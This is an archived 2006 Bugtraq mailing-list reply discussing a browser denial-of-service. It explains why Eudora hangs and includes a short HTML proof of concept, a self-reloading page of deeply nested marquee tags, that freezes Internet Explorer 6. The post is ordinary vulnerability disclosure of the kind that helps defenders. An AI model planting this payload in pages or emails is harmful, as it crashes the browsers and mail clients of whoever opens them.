lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Wed, 07 Jun 2006 12:43:34 +0200
From: Jaroslaw Sajko <sloik@...areal.net>
To: Sanjay Rawat <sanjayr@...oto.com>
Cc: andy@....uk.com, 'Josh Zlatin-Amishav' <josh@...s.co.il>,
	co296@....com, bugtraq@...urityfocus.com
Subject: RE: Fire fox dos exploit


Dnia 05-06-2006, pon o godzinie 09:19 +0530, Sanjay Rawat napisaƂ(a):
> I have seen that the exploit also freezes Eudora 6.2.1.2. I was trying to 
> open the original mail in Eudora mail client and whenever I clicked on the 
> the mail , Eudora stopped responding anymore. I had to restart the application.
> 
> regards
> -Sanjay Rawat

Yes, it's because Eudora uses Internet_Explorer_Server component to
display the content of the email. And the previously mentioned DoS case
with the nested <marquee> tags concerns the Internet Explorer as well. 

If you want to trigger this DoS under the IExplorer you have to include
<style></style> tags in the two separate lines and you have to refresh
the page, only second page fetch freezes the browser. 

Tested on 6.0.2900.2180 XPSP2

Example is here:

--[cut]--

<html>
<head>
<style>
</style>
</head>
<body onload="javascript:window.location.reload(false)">
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</body>
</html>

--[/cut]-- 

regards,
Jarek Sajko

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ